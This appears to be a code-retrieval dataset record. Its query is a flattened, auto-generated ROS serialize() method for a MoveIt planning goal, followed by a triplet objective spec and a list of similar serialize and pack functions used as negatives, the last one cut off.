*self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms: _v110 = val1.translation _x = _v110 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v111 = val1.rotation _x = _v111 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist: _v112 = val1.linear _x = _v112 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v113 = val1.angular _x = _v113 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = 
len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench: _v114 = val1.force _x = _v114 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v115 = val1.torque _x = _v115 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v116 = val1.object _v117 = _v116.header buff.write(_get_struct_I().pack(_v117.seq)) _v118 = _v117.stamp _x = _v118 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v117.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v116.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v119 = _v116.type _x = _v119.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v119.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v116.primitives) buff.write(_struct_I.pack(length)) for val3 in _v116.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.dimensions)) length = len(_v116.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.primitive_poses: _v120 = val3.position _x = _v120 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v121 = val3.orientation _x = _v121 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v116.meshes) buff.write(_struct_I.pack(length)) for val3 in _v116.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(_get_struct_3I().pack(*val4.vertex_indices)) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v116.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.mesh_poses: _v122 = val3.position _x = _v122 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v123 = val3.orientation _x = _v123 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v116.planes) buff.write(_struct_I.pack(length)) for val3 in _v116.planes: buff.write(_get_struct_4d().pack(*val3.coef)) length = len(_v116.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.plane_poses: _v124 = val3.position _x = _v124 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v125 = val3.orientation _x = _v125 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v116.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v116.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = 
len(_v116.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.subframe_poses: _v126 = val3.position _x = _v126 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v127 = val3.orientation _x = _v127 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v116.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v128 = val1.detach_posture _v129 = _v128.header buff.write(_get_struct_I().pack(_v129.seq)) _v130 = _v129.stamp _x = _v130 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v129.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v128.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v128.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v128.points) buff.write(_struct_I.pack(length)) for val3 in _v128.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.positions)) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.velocities)) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.accelerations)) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.effort)) _v131 = val3.time_from_start _x = _v131 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.robot_state.is_diff)) _x = self.goal.planning_options.planning_scene_diff.robot_model_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.fixed_frame_transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.fixed_frame_transforms: _v132 = val1.header buff.write(_get_struct_I().pack(_v132.seq)) _v133 = _v132.stamp _x = _v133 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v132.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.child_frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v134 = val1.transform _v135 = _v134.translation _x = _v135 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v136 = _v134.rotation _x = _v136 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length 
= len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values: length = len(val1.enabled) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(struct.pack(pattern, *val1.enabled)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values)) length = len(self.goal.planning_options.planning_scene_diff.link_padding) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_padding: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.padding)) length = len(self.goal.planning_options.planning_scene_diff.link_scale) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_scale: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.scale)) length = len(self.goal.planning_options.planning_scene_diff.object_colors) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.object_colors: _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v137 = val1.color _x = _v137 buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a)) length = len(self.goal.planning_options.planning_scene_diff.world.collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.world.collision_objects: _v138 = val1.header buff.write(_get_struct_I().pack(_v138.seq)) _v139 = _v138.stamp _x = _v139 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v138.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v140 = val1.type _x = _v140.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v140.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.primitives) buff.write(_struct_I.pack(length)) for val2 in val1.primitives: buff.write(_get_struct_B().pack(val2.type)) length = len(val2.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, 
*val2.dimensions)) length = len(val1.primitive_poses) buff.write(_struct_I.pack(length)) for val2 in val1.primitive_poses: _v141 = val2.position _x = _v141 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v142 = val2.orientation _x = _v142 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.meshes) buff.write(_struct_I.pack(length)) for val2 in val1.meshes: length = len(val2.triangles) buff.write(_struct_I.pack(length)) for val3 in val2.triangles: buff.write(_get_struct_3I().pack(*val3.vertex_indices)) length = len(val2.vertices) buff.write(_struct_I.pack(length)) for val3 in val2.vertices: _x = val3 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(val1.mesh_poses) buff.write(_struct_I.pack(length)) for val2 in val1.mesh_poses: _v143 = val2.position _x = _v143 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v144 = val2.orientation _x = _v144 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.planes) buff.write(_struct_I.pack(length)) for val2 in val1.planes: buff.write(_get_struct_4d().pack(*val2.coef)) length = len(val1.plane_poses) buff.write(_struct_I.pack(length)) for val2 in val1.plane_poses: _v145 = val2.position _x = _v145 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v146 = val2.orientation _x = _v146 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.subframe_names) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_names: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) length = len(val1.subframe_poses) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_poses: _v147 = val2.position _x = _v147 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v148 = val2.orientation _x = _v148 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(val1.operation)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_7d3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) 
buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution)) length = len(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data) buff.write(_struct_I.pack(length)) pattern = '<%sb'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data)) _x = self buff.write(_get_struct_3BidBid().pack(_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay)) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self))))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
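The generated serialize() method in this record's document reduces to one recurring idiom: every variable-length string field is written as a little-endian uint32 byte count followed by the UTF-8 bytes, and every fixed-layout group of fields goes through a precompiled struct pattern (the _get_struct_3I / _get_struct_4d helpers). A minimal, self-contained sketch of that idiom follows; the write_string helper name and the sample values are illustrative assumptions, not part of the dataset record.

import struct
from io import BytesIO

def write_string(buff, s):
    # Mirror the recurring '<I%ss' pattern: 4-byte little-endian length, then the UTF-8 bytes.
    data = s.encode('utf-8')
    buff.write(struct.pack('<I%ss' % len(data), len(data), data))

buff = BytesIO()
write_string(buff, 'base_link')
# buff.getvalue() == b'\x09\x00\x00\x00base_link'

# Fixed-layout fields use precompiled patterns, e.g. three uint32 header values (seq, secs, nsecs):
buff.write(struct.Struct('<3I').pack(0, 1700000000, 0))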
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_2d2q14dq.pack(_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret))\n _x = self.msg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _send_serialized(self, socket, msg):\n socket.send(pickle.dumps(msg))", "def serialize_message(self) -> bytes:\n return self.compile_message().serialize()", "def serialize(self, buff):\n try:\n pass\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_struct_B.pack(self.result))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEd25519SignatureDepB._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self):\n messageLen = len(self._messageBuf) + 1 # 1 byte for the message type\n header = pack(self.headerFormat, messageLen)\n msgType = pack(self.messageTypeFormat, self.messageType)\n payload = bytes(self._messageBuf)\n return header + msgType + payload", "def serialize(self, buff):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self):\n\n # The len must be multiple of 4 bits to convert unambiguously\n\n id_len = self.id.bit_length()\n while (id_len % 4)!= 0:\n id_len += 1\n if self.payload:\n pay_len = self.payload.bit_length()\n while (pay_len % 4)!= 0:\n pay_len += 1\n else: pay_len = 0\n if self.command:\n com_len = self.command.bit_length()\n while (com_len % 4)!= 0:\n com_len += 1\n else: com_len = 0\n\n values = {\n \"id\": self.id,\n \"id_len\": id_len,\n \"payload\": self.payload,\n \"payload_len\": pay_len,\n \"command\": self.command,\n \"command_len\": com_len\n }\n\n\n if self.id == Message.MEASURE or self.id == Message.SINGLE_MEASURE:\n serial_format = (\n \"uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n else:\n serial_format = (\n \"0x23, uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n\n message = bitstring.pack(serial_format, **values)\n\n rospy.logdebug(\"Sent command '0x%s'\", message.hex)\n\n return message.tobytes()", "def write_message(message):\n\n return message.to_bytes()", "def serialize(self, buff):\n try:\n _x = self\n 
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.robot_id.id))\n _x = self.robot_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs))\n _x = self.agv_msg.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.agv_msg.vehicle_id.id))\n _x = self.agv_msg.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage))\n _x = self.agv_msg.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.agv_msg.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.agv_msg.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.agv_msg.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if 
python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.canmsg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_Bf2B2f2B2fBf().pack(_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaSignature._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n length = len(self.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.position))\n length = len(self.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.velocity))\n length = len(self.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.effort))\n length = len(self.position_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.position_command))\n length = len(self.velocity_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.velocity_command))\n length = len(self.effort_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.effort_command))\n length = len(self.accelerometer)\n buff.write(_struct_I.pack(length))\n for val1 in self.accelerometer:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.gyro)\n buff.write(_struct_I.pack(length))\n for val1 in self.gyro:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.orientation)\n buff.write(_struct_I.pack(length))\n for val1 in self.orientation:\n _x = val1\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.deflection)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.deflection))\n length = len(self.deflection_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.deflection_velocity))\n length = len(self.motor_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_velocity))\n length = len(self.motor_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_current))\n length = len(self.motor_winding_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n 
buff.write(struct.pack(pattern, *self.motor_winding_current))\n length = len(self.motor_sensor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_sensor_temperature))\n length = len(self.motor_winding_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_winding_temperature))\n length = len(self.motor_housing_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_housing_temperature))\n length = len(self.board_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.board_temperature))\n length = len(self.processor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.processor_temperature))\n length = len(self.voltage)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.voltage))\n length = len(self.led_color)\n buff.write(_struct_I.pack(length))\n for val1 in self.led_color:\n _x = val1\n buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a))\n length = len(self.sequence_number)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.sequence_number))\n length = len(self.receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.receive_time))\n length = len(self.transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.transmit_time))\n length = len(self.hardware_receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.hardware_receive_time))\n length = len(self.hardware_transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.hardware_transmit_time))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def pack(self,buffer):\n 